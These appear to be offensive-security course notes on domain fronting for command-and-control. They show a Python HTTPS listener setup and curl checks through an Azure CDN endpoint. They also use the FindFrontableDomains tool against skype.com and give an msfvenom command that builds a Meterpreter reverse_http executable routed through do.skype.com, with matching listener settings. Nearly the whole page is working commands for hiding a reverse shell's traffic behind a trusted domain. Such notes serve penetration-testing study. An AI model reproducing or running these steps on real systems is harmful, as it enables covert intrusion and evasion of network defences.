Domain Fronting

Host: custom CDN, DEST: frontable domain's IP ; shell connection looks like calling to custom CDN with frontable domain's IP but it is point to custom origin hostname ip by the custom CDN

setup custom CDN endpoint & custom origin hostname that listener host hosting the web ser

cust. origin hostname ser

sudo python3 -m http.server 80

ser to handle https

from http.server import HTTPServer, SimpleHTTPRequestHandler
import ssl
import socketserver

httpd = socketserver.TCPServer(('138.68.99.177', 443), SimpleHTTPRequestHandler)

httpd.socket = ssl.wrap_socket(httpd.socket, 
        keyfile="key.pem", 
        certfile='cert.pem', server_side=True)

httpd.serve_forever()

sudo python3 httpsserver.py

verify connectivity

curl http://offensive-security.azureedge.net
curl -k https://offensive-security.azureedge.net

the CDN fetch the custom origin hostname web ser

git clone https://github.com/rvrsh3ll/FindFrontableDomains
cd FindFrontableDomains/
sudo ./setup.sh
python3 FindFrontableDomains.py --domain skype.com

check if it is fetching custom server content from the host that host the custom origin hostname web set in 1. (same as 1. end results)

curl --header "Host: offensive-security.azureedge.net" http://do.skype.com

4. create payload

msfvenom -p windows/x64/meterpreter/reverse_http LHOST=do.skype.com LPORT=80 HttpHostHeader=offensive-security.azureedge.net -f exe > http-df.exe

configure listener on VM that hosting the 1. custom origin hostname web

set LHOST do.skype.com
set OverrideLHOST do.skype.com
set OverrideRequestHost true
set HttpHostHeader offensive-security.azureedge.net
run -j

PreviousBypass Network Filters NextDNS Tunneling

Last updated 1 year ago